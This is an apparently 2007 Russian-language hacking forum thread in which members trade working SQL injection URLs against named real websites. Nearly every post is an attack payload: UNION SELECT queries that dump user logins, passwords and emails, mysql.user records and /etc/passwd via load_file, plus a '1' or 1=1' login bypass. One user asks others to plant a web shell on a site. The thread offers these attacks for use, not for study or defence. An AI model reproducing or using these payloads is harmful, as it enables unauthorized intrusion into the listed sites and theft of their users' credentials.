11.08.2007, 08:31
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
http://driver.ru/?file_id=31819+and+ascii(lower(substring(version() ,1,1)))=0x34
MySQL 4.x
|
|
|
11.08.2007, 13:55
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами:
9876886
Репутация:
18
|
|
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
Ну вроде бы обычная скуля, ничего примечательного, однако:
Кавычки не фильтруются
есть file priv...
есть доступ к mysql.user
http://mgrant.ru/safe_gl.php?safeid=-1+union+select+1,2,user,password,load_file('/etc/passwd'),6,7,8,9,10+from+mysql.user+limit+0,1/*
Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь.
Удачи =)
PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят. |
|
|
|
11.08.2007, 17:21
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
С нами:
9982591
Репутация:
29
|
|
Сообщение от sharoff
Вот копался по сайтам, жомил на всякую рекламу и наткнулся на слабый по хар-кам, но интересный по скулям сайтец. Нашел несколько штук, воспользуюсь только одной
Ну вроде бы обычная скуля, ничего примечательного, однако:
Кавычки не фильтруются
есть file priv...
есть доступ к mysql.user
Кто зальет шелл стукните в личку/аську, я чего-то там недогнал немнога, юзеры все лежат в /etc/passwd, в httpd только путь.
Удачи =)
PS: версия четвертая, таблы не просмотреть, я там нашел парочку, уже не помню названия, логины и пароли ни к чему не подходят.
Там еще Post Sql inj:
вход:
1' or 1=1/*
в админке авторизация базик
|
|
|
|
12.08.2007, 11:13
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами:
10305026
Репутация:
187
|
|
Код:
http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,TABLE_NAME,4%20FROM+INFORMATION_SCHEMA.TABLES%20limit%200,1/*
Код:
http://www.phfokc.com/show_press.php?id=430000%20union%20select%201,2,column_name,4%20FROM+information_schema.columns%20limit%200,1/*
|
|
|
|
13.08.2007, 14:32
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами:
10214321
Репутация:
552
|
|
большая бд 
Код:
http://www.comicbookresources.com/news/newsitem.cgi?id=-11511+union+select+1,2,3,4,concat_ws(0x203a20,id,name,password,email),6,7,8+from+users+limit+16000,1/*
|
|
|
|
13.08.2007, 15:32
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
инъекция тут
Код:
http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
таблица users |
|
|
|
13.08.2007, 16:42
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами:
10305026
Репутация:
187
|
|
Сообщение от phol1eadeux
инъекция тут
Код:
http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
таблица users
Код:
http://www.dog.ru/index.php3?mode=5&id=417652--00+union+select+1,2,3,4,5,concat(name,char(58),passwd,char(58),email,char(58),id,char(58),version(),char(58),user(),char(58),database()),7,8,9,10,11,12,13,14%20from%20users%20limit%200,1/*
+table "search"
|
|
|
|
13.08.2007, 17:09
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
http://www.flashonthebeach.com
http://www.flashonthebeach.com/speakers/index.php?pageid=-1+UNION+SELECT+1,USER(),3,4,VERSION()/*
|
|
|
|
13.08.2007, 17:15
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
Код:
http://fckhimki.ru/modules/players/print.php?current_id=&player_id=-1+union+select+1,2,3,4,5,6,concat(name,char(58),height,char(58),weight,char(58),country,char(58),position),8,9,10,11,12,13,14,15,16,17,18,19,20+from+players+limit+0,1/*
база: fckhimki_new1;
версия: 4.0.27-max-log;
юзер: fckhimki_new1@v2.valuehost.ru
К базам mysql и forum подобраться не получиться, зато
можно поиздеваться над таблицами news и players 
Последний раз редактировалось phol1eadeux; 13.08.2007 в 17:27..
|
|
|
|
13.08.2007, 17:31
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
С нами:
9999746
Репутация:
1318
|
|
http://www.sat-tv.ru
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,CONCAT_WS(CHAR(42),VERSION(),USER (),DATABASE()),3,4,5,6,7,8,9,0+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,0+FROM+I NFORMATION_SCHEMA.TABLES+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,0+FROM+ INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(0 x55,0x73,0x65,0x72,0x73)+--+
http://www.sat-tv.ru/?pageId=4&subId=-1+UNION+SELECT+1,CONCAT_WS(CHAR(42),Login,Password ),3,4,5,6,7,8,9,0+FROM+Users+--+
Последний раз редактировалось groundhog; 13.08.2007 в 17:41..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
